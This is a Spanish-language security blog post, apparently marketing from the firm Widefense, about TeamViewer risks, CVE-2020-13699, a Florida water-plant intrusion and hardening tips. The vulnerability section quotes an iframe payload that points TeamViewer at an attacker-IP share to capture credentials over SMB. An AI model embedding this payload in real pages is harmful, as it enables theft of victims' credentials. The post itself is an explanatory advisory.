TeamViewer se ha convertido en una de las plataformas más populares por los usuarios para acceder de forma remota a otros dispositivos. De acuerdo al sitio web, cuenta con más de 580 mil clientes alrededor del mundo y 320 millones de dispositivos activos al año. Una cifra que corrobora la aprobación de quienes lo utilizan.
Sin embargo, TeamViewer no es seguro en su totalidad. Al usar esta herramienta, podrías ser víctima de un ataque cibernético, que pondría en riesgo toda la información confidencial que puedes almacenar sobre tu organización y la de tus colaboradores.
Pensando en ello, te informamos acerca de los riesgos de ciberseguridad que debes conocer si usas esta plataforma.
Es una herramienta de asistencia remota que permite compartir la actividad en la pantalla de un dispositivo con otro usuario que tenga descargado TeamViewer. Lo puedes conectar a computadoras, servidores, Smartphones, dispositivos de loT, entre otros.
Su popularidad en las organizaciones se debe a la facilidad de brindar soporte técnico vía remota con un especialista, compartir información confidencial entre usuarios, organizar reuniones laborales, grabar sesiones para quienes no estuvieron presentes, supervisión de proyectos en la empresa, entre otros.
TeamViewer presenta un fallo que pone en peligro la información confidencial de organizaciones y colaboradores. Este error permite que un intruso pueda acceder a cualquier equipo de escritorio sin ser notificado y realice diferentes tipos de ataques como robo de información, suplantación, entre otros. La vulnerabilidad se ha denominado como CVE-2020-13699 y ha sido considerado de alto peligro.
Para que un computador pueda ser vulnerable al ataque, el cracker debe redirigir al usuario a un sitio web malicioso, presente en versiones antiguas de TeamViewer. Una vez logrado, el atacante usaría un atributo src del iframe en ‘teamviewer 10: –play attacker-IP share fake.tvs’. Al realizarlo, permite que TeamViewer se conecte al dispositivo del cracker mediante un SMB, obteniendo el dominio del computador de la víctima.
A principios de marzo, fue descubierto un ciberataque que intentaba modificar el sistema para tratamiento del agua en una planta potabilizadora en Florida, Estados Unidos. Al parecer, el pirata informático logró acceder a una de las computadoras a través de la herramienta para el acceso remoto TeamViewer, que era utilizada por los operadores de esta planta, que suministra agua potable a unos 15.000 habitantes, para resolver problemas de forma remota o con el propósito de monitorear los sistemas.
Como organización es importante proteger la información confidencial que almacenas en tus dispositivos. En Widefense, te brindamos algunas recomendaciones que puedes implementar si no deseas ser víctima de un ataque cibernético.
Debido a las amenazas que se presentan en la plataforma, TeamViewer constantemente realiza renovaciones para que sus usuarios no sean víctimas de la ciberdelincuencia. Te recomendamos que actualices a la última versión que presenta la herramienta, así evitarás que un atacante entre a tu dispositivo.
Una manera para evitar ser víctima de algún cracker, es la opción de activar la verificación en dos pasos. Al realizarlo, el sistema te pedirá un código de verificación que es enviado a tu móvil al iniciar sesión. Para configurarlo, puedes hacerlo en la opción de editar tu perfil en TeamViewer y listo.
Esta lista permitirá configurar las conexiones a dispositivos asociados a la cuenta, de forma que solo las cuentas seleccionadas puedan acceder, de manera de negar acceso a los dispositivos extraños, aun contando con el ID y contraseña del equipo.
En Widefense contamos con soluciones de última generación que te pueden ayudar a mantener los dispositivos electrónicos de todo el equipo de tu organización de forma segura.
La solución número uno para que las empresas líderes accedan y brinden soporte de manera segura a cualquier dispositivo o sistema, desde cualquier parte del mundo. Funciona a través de firewalls sin túnel VPN, por lo que la seguridad puede permanecer intacta. Todo el tráfico de sesión y los datos en tránsito están encriptados, y se registra cada sesión remota para un seguimiento de auditoría detallado
Vive la ciberseguridad sin miedo. Conversa con uno de nuestros especialistas de ciberseguridad en contacto@widefense.com, agenda una asesoría en Chile +56 9 7569 9259 o Colombia +57 3155 097 765 o escríbenos vía WhatsApp.